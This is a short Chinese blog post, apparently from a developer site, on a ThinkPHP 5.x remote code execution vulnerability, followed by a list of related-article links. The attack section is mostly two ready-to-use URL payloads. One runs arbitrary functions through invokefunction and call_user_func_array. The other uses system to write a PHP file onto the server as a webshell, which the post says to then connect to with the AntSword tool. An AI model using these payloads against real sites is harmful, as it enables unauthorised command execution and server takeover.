常见框架漏洞:Thinkphp(TP)篇

与神明画鸭2025-03-26 7:04

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码 
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码 
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
用户14644605033792 天前
PHP 多维数组处理利器:array_column() 用法详解
php·thinkphp
独角鲸网络安全实验室3 天前
CVE-2025-61882深度分析:Oracle Concurrent Processing BI Publisher集成远程接管漏洞的技术原理与防御策略
数据库·网络安全·oracle·漏洞·ebs·cve-2025-61882·xml 注入
用户3074596982077 天前
ThinkPHP 6.0 多应用模式下的中间件机制详解
后端·thinkphp
白帽子凯哥哥12 天前
2026零基础如何参与护网行动?(非常详细)
数据库·sql·学习·漏洞·xss
行思理17 天前
小游戏系统提供二开服务
layui·游戏程序·小游戏·thinkphp
白帽子凯哥哥17 天前
在学习SQL注入或XSS这类具体漏洞时,如何设计一个高效的“理论+实践”学习循环?
sql·学习·漏洞·xss
独角鲸网络安全实验室21 天前
高危预警!React核心组件曝CVSS 9.8漏洞,数百万开发者面临远程代码执行风险
运维·前端·react.js·网络安全·企业安全·漏洞·cve-2025-11953
独角鲸网络安全实验室21 天前
高危预警!React CVE-2025-55182 突破 RSC 防护,未授权 RCE 威胁 39% 云应用
前端·react.js·网络安全·前端框架·漏洞·rce·cve-2025-55182
网络研究院1 个月前
监管要求不统一暴露了移动安全方面的漏洞
网络·安全·漏洞·风险·监管
至善迎风1 个月前
React2Shell(CVE-2025-55182)漏洞服务器排查完整指南
网络安全·react·数据安全·漏洞·next·rsc·cve-2025-55182
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05jdk21下载、安装(Windows、Linux、macOS)062025-04-03 Latex学习1——本地配置Latex + VScode环境07【踩坑笔记】50系显卡适配的 PyTorch 安装08Opencode CLI 安装成功,但是启动失败09UV安装并设置国内源10全球最强模型Grok4,国内已可免费使用!(附教程)